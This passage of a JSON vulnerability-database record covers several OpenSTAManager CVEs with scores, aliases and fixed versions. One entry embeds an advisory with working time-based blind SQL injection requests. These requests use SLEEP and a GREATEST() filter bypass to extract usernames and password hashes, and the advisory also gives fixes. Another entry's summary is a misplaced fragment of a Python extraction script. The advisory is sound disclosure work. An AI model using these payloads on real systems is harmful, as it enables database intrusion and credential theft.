"scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-06T18:55:27Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h" } ], "fixed_packages": [], "aliases": [ "CVE-2026-24417", "GHSA-4hc4-8599-xh2h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nzzy-h46k-bfcr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50041?format=api", "vulnerability_id": "VCID-pxzr-bvsj-y3gs", "summary": "OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)\nA SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69214", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04208", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04219", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0422", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05507", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69214" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69214", "reference_id": "CVE-2025-69214", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69214" }, { "reference_url": "https://github.com/advisories/GHSA-qjv8-63xq-gq8m", "reference_id": "GHSA-qjv8-63xq-gq8m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qjv8-63xq-gq8m" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m", "reference_id": "GHSA-qjv8-63xq-gq8m", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:52Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2025-69214", "GHSA-qjv8-63xq-gq8m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pxzr-bvsj-y3gs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95071?format=api", "vulnerability_id": "VCID-uq8m-y1hg-qbgx", "summary": "OpenSTAManager contains an arbitrary file upload vulnerability in its module update functionality\nOpenSTAManager versions 2.10 and earlier contain an arbitrary file upload vulnerability in the module update functionality (modules/aggiornamenti/upload_modules.php).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-38751", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17849", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17735", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17811", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17845", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-38751" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:15:57Z/" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/fuutianyii/poc", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:15:57Z/" } ], "url": "https://github.com/fuutianyii/poc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-38751", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-38751" }, { "reference_url": "https://github.com/advisories/GHSA-rm34-fg4m-39mw", "reference_id": "GHSA-rm34-fg4m-39mw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rm34-fg4m-39mw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1006110?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.1" } ], "aliases": [ "CVE-2026-38751", "GHSA-rm34-fg4m-39mw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uq8m-y1hg-qbgx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49976?format=api", "vulnerability_id": "VCID-w4gk-vbbq-13ea", "summary": "OpenSTAManager has an SQL Injection in the Stampe Module\nprint(\"=\"*70)\nprint(\" EXTRACTION SUMMARY\")\nprint(\"=\"*70)\nprint()\n\nif results:\nfor key, value in results.items():\nprint(f\" {key:.<40} {value}\")", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69215", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13534", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17565", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17644", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17676", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69215" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69215", "reference_id": "CVE-2025-69215", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69215" }, { "reference_url": "https://github.com/advisories/GHSA-qx9p-w3vj-q24q", "reference_id": "GHSA-qx9p-w3vj-q24q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qx9p-w3vj-q24q" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qx9p-w3vj-q24q", "reference_id": "GHSA-qx9p-w3vj-q24q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-04T19:31:22Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qx9p-w3vj-q24q" } ], "fixed_packages": [], "aliases": [ "CVE-2025-69215", "GHSA-qx9p-w3vj-q24q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w4gk-vbbq-13ea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89415?format=api", "vulnerability_id": "VCID-y85c-bbqe-r3bt", "summary": "OpenSTAManager has a Time-Based Blind SQL Injection via `options[stato]` Parameter\n## Description\n\nMultiple AJAX select handlers in OpenSTAManager <= 2.10.1 are vulnerable to Time-Based Blind SQL Injection through the `options[stato]` GET parameter. The user-supplied value is read from `$superselect['stato']` and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database.\n\n## Affected Endpoints\n\nThree modules share the same vulnerability pattern:\n\n### 1. Preventivi (Quotes) - Primary\n\n- **Endpoint:** `GET /ajax_select.php?op=preventivi`\n- **File:** `modules/preventivi/ajax/select.php`, line 60\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/preventivi/ajax/select.php, lines 59-60\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';\n$where[] = '('.$stato.' = 1)';\n```\n\nThe `$stato` variable is inserted as a bare expression inside parentheses. The resulting SQL fragment becomes `({user_input} = 1)`, allowing an attacker to break out of the expression and inject arbitrary SQL.\n\n### 2. Ordini (Orders)\n\n- **Endpoint:** `GET /ajax_select.php?op=ordini-cliente`\n- **File:** `modules/ordini/ajax/select.php`, line 52\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/ordini/ajax/select.php, lines 51-52\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_fatturabile';\n$where[] = '`or_statiordine`.'.$stato.' = 1';\n```\n\nThe `$stato` variable is inserted as a column name reference. The resulting SQL fragment becomes `` `or_statiordine`.{user_input} = 1 ``, allowing injection after the table-column reference.\n\n### 3. Contratti (Contracts)\n\n- **Endpoint:** `GET /ajax_select.php?op=contratti`\n- **File:** `modules/contratti/ajax/select.php`, line 57\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/contratti/ajax/select.php, lines 56-57\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';\n$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';\n```\n\nThe `$stato` variable is inserted inside a subquery. The resulting SQL fragment becomes `WHERE {user_input} = 1)`, allowing an attacker to close the subquery and inject into the outer query.\n\n## Root Cause Analysis\n\n### Data Flow\n\n1. The attacker sends a GET request with `options[stato]=<payload>` to `/ajax_select.php`\n2. `ajax_select.php` (line 30) reads the value via `filter('options')`, which applies HTMLPurifier sanitization\n3. HTMLPurifier strips HTML tags and the `>` character, but does **NOT** strip SQL keywords (`SELECT`, `SLEEP`, `IF`, `UNION`, etc.) or SQL-significant characters (`(`, `)`, `=`, `'`, etc.)\n4. The sanitized value is passed to `AJAX::select()` in `src/AJAX.php` (line 40)\n5. `AJAX::getSelectResults()` assigns `$superselect = $options` (line 273) and `require`s the module's `select.php` file (line 275)\n6. The module's `select.php` reads `$superselect['stato']` and concatenates it directly into the `$where[]` array\n7. `AJAX::selectResults()` joins all WHERE elements with `AND` and executes the query via `Query::executeAndCount()` (line 120)\n\n### Why HTMLPurifier is Insufficient\n\nHTMLPurifier is an HTML sanitization library designed to prevent XSS attacks. It is **not** an SQL injection prevention mechanism. Specifically:\n\n- It does **not** strip SQL keywords: `SELECT`, `SLEEP`, `IF`, `UNION`, `FROM`, `WHERE`\n- It does **not** strip SQL operators: `=`, `(`, `)`, `,`, `+`, `-`, `*`\n- It strips the `>` character (used in HTML), which can be bypassed using MySQL's `GREATEST()` function\n- It provides zero protection against SQL injection\n\n## Proof of Concept\n\n### Prerequisites\n\n- A valid user account on the OpenSTAManager instance (any privilege level)\n- Network access to the application\n\n### Step 1: Authenticate\n\n```\nPOST /index.php HTTP/1.1\nHost: <target>\nContent-Type: application/x-www-form-urlencoded\n\nop=login&username=<user>&password=<pass>\n```\n\nSave the `PHPSESSID` cookie from the `Set-Cookie` response header.\n\n### Step 2: Verify Injection (SLEEP test)\n\n**Baseline request** (normal response time ~200ms):\n\n```\nGET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=is_pianificabile HTTP/1.1\nHost: <target>\nCookie: PHPSESSID=<session>\n```\n\n**Injection request** (response time ~10 seconds):\n\n```\nGET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1 HTTP/1.1\nHost: <target>\nCookie: PHPSESSID=<session>\n```\n\n**Expected result:** The response is delayed by approximately 10 seconds, confirming that the `SLEEP(10)` function was executed by the database server. The response body in both cases is identical: `{\"results\":[],\"recordsFiltered\":0}`.\n\n<img width=\"934\" height=\"491\" alt=\"image\" src=\"https://github.com/user-attachments/assets/27beff84-3e25-43e1-b484-76db25c0faa8\" />\n\n\n### Step 3: Data Extraction (demonstrating impact)\n\nUsing binary search with time-based boolean conditions, an attacker can extract arbitrary data. The `>` character is stripped by HTMLPurifier, so the `GREATEST()` function is used as an equivalent:\n\n**Extract username length:**\n\n```\nGET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(LENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1)),3%2B1)%3DLENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1))),SLEEP(2),0)))a)+AND+(1 HTTP/1.1\n```\n\nThis technique was used to successfully extract:\n\n- **Username:** `admin` (5 characters, extracted character by character)\n- **Password hash prefix:** `$2y$10$qAo04wNbhR9cpxjHzrtcnu...` (bcrypt)\n- **MySQL version:** `8.3.0`\n\n### PoC for Other Endpoints\n\n**Ordini (orders):**\n\n```\nGET /ajax_select.php?op=ordini-cliente&options[idanagrafica]=1&options[stato]=is_fatturabile+%3D+1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+1 HTTP/1.1\n```\n\n**Contratti (contracts):**\n\n```\nGET /ajax_select.php?op=contratti&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+(1 HTTP/1.1\n```\n\nBoth endpoints show the same SLEEP-based timing delay, confirming the injection.\n\n## Impact\n\n- **Confidentiality:** An attacker can extract the entire database contents, including user credentials (usernames and bcrypt password hashes), personal identifiable information (PII), financial records (invoices, quotes, contracts, payments), and application configuration.\n- **Integrity:** With MySQL's `INSERT`/`UPDATE` capabilities via subqueries, an attacker may be able to modify data.\n- **Availability:** An attacker can execute `SLEEP()` with large values or resource-intensive queries to cause denial of service.\n\n## Proposed Remediation\n\n### Option A: Allowlist Validation (Recommended)\n\nReplace the direct concatenation with an allowlist of permitted column names:\n\n```php\n// modules/preventivi/ajax/select.php — FIXED\n$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile', 'is_concluso'];\n$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)\n ? $superselect['stato']\n : 'is_pianificabile';\n$where[] = '('.$stato.' = 1)';\n```\n\n```php\n// modules/ordini/ajax/select.php — FIXED\n$allowed_stati = ['is_fatturabile', 'is_evadibile', 'is_completato'];\n$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)\n ? $superselect['stato']\n : 'is_fatturabile';\n$where[] = '`or_statiordine`.'.$stato.' = 1';\n```\n\n```php\n// modules/contratti/ajax/select.php — FIXED\n$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile'];\n$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)\n ? $superselect['stato']\n : 'is_pianificabile';\n$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';\n```\n\nThis approach is recommended because the `stato` parameter represents a database column name (not a value), so prepared statements cannot be used here. The allowlist ensures only known-safe column names are accepted.\n\n### Option B: Regex Validation (Alternative)\n\nIf the set of column names is dynamic, validate the format strictly:\n\n```php\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';\nif (!preg_match('/^[a-z_]+$/i', $stato)) {\n $stato = 'is_pianificabile'; // fallback to safe default\n}\n$where[] = '('.$stato.' = 1)';\n```\n\nThis ensures only alphabetic characters and underscores are accepted, preventing any SQL injection.\n\n### Option C: Backtick Quoting (Supplementary)\n\nIn addition to validation, wrap the column name in backticks to treat it as an identifier:\n\n```php\n$where[] = '(`'.str_replace('`', '', $stato).'` = 1)';\n```\n\n**Note:** This alone is insufficient without input validation but provides defense-in-depth.\n\n### Global Recommendation\n\nAudit all usages of `$superselect` across the codebase. Any value from `$superselect` that is used as part of a SQL expression (not as a parameterized value) must be validated against an allowlist. The `prepare()` function is already used correctly in other parts of the code — the issue is specifically where `$superselect` values are used as column names or bare expressions.\n\n### Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28805", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03098", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03029", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03047", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03088", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28805" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7" }, { "reference_url": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28805", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28805" }, { "reference_url": "https://github.com/advisories/GHSA-3gw8-3mg3-jmpc", "reference_id": "GHSA-3gw8-3mg3-jmpc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3gw8-3mg3-jmpc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-28805", "GHSA-3gw8-3mg3-jmpc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y85c-bbqe-r3bt" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.4.25" }